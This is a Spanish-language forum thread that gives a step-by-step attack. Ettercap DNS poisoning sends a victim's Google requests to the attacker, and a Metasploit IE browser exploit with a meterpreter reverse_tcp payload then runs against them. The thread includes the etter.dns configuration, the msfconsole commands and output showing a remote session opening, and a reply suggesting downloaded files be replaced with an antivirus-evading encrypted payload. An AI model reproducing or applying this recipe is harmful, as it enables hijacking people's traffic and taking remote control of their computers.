Results 1 to 6 of 6

Thread: Envenenamiento DNS y MSF, mas que amigos... :)

  1. #1
    Just burned his ISO Belerofonte's Avatar
    Join Date
    Dec 2009
    Posts
    7

    Default Envenenamiento DNS y MSF, mas que amigos... :)

    Buenas a todos, me apasiona este mundo de la seguridad informatica y queria compartir con vosotros un metodo que puse en practica hace algun tiempo.

    Es bastante simple la verdad, pero siempre me comia la cabeza pensando en como redireccionar las peticiones de un host a donde yo quisiera, pues bien...

    Utilizo tecnicas de envenenamiento DNS con ettercap, el fichero de configuracion quedaria de la siguiente manera, dentro del programa hay que habilitar el plug-in de envenenamiento para que esta redireccion tenga exito.

    root@linux-on-war:/home/belerofonte# vi /usr/share/ettercap/etter.dns

    ################################
    #
    *google* A 192.168.1.20
    #
    ################################

    con esto redireccionamos cualquier peticion de navegacion a google redireccionandola a nuestra maquina.

    En Metasploit configuraremos un servidor que este a la espera de recibir una conexion y a si vulnerar el fallo.
    Al tratarse de trafico web configuraremos el servidor por el puerto 80 y seleccionamos un path para que salte automaticamente sin indicar nada.

    Seleccionamos nuestro payload y arrancamos el servidor...

    Code:
    root@linux-on-war:/home/belerofonte# msfconsole
    
    msf > use exploit/windows/browser/ms09_072_style_object
    
    msf exploit(ms09_072_style_object) > setg SRVHOST 192.168.1.20
    SRVHOST => 192.168.1.20
    
    msf exploit(ms09_072_style_object) > setg SRVPORT 80
    SRVPORT => 80
    
    msf exploit(ms09_072_style_object) > setg URIPATH /
    URIPATH => /
    
    msf exploit(ms09_072_style_object) > set PAYLOAD windows/meterpreter/reverse_tcp 
    PAYLOAD => windows/meterpreter/reverse_tcp
    
    msf exploit(ms09_072_style_object) > setg LHOST 192.168.1.20
    LHOST => 192.168.1.20
    
    msf exploit(ms09_072_style_object) > exploit [*] Exploit running as background job.
    El equipo victima navega a google...
    Code:
    [*] Started reverse handler on port 4444
    [*] Using URL: hxxp://192.168.1.20:80/
    [*] Server started.
    [*] Entering heap spray mode for 192.168.1.21:49844
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.21:49873)
    Espero que os guste, un saludo...

    Belerofonte

  2. #2
    Just burned his ISO Orph4n's Avatar
    Join Date
    Dec 2009
    Posts
    11

    Default

    cuando inicial el exploit se me estanca en
    Entering heap spray mode for 192.168.1.21:49844
    no abre la sesion solo resive datos.....
    pero de todas formas esta muy bueno el metodo 8)

  3. #3
    Just burned his ISO Belerofonte's Avatar
    Join Date
    Dec 2009
    Posts
    7

    Default

    Hola Orph4n, este ejemplo es contra un Windows Vista Business con IE versión 7, he probado en la ultima versión 8 de IE y no funciona ...

  4. #4
    grancerote
    Guest

    Default

    para este tipo de ataques yo les recomedaria crear un filtro para que este a la escucha de archivos .exe o .zip y sean reemplazodos por un payload como meterpreter/reverse_tcp encriptado para brincarse algunos antivirus y firewalls

    Ademas este ataca a cualquier web; pero su debilidad es que necesitamos que el usuario descarge un archivo :S

  5. #5
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    20

    Default

    La victima tiene que estar en lan?

    Saludos

  6. #6
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    2

    Default Re: Envenenamiento DNS y MSF, mas que amigos... :)

    oh, muy buena, ya ando por acá investigando con mi máquina virtual

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •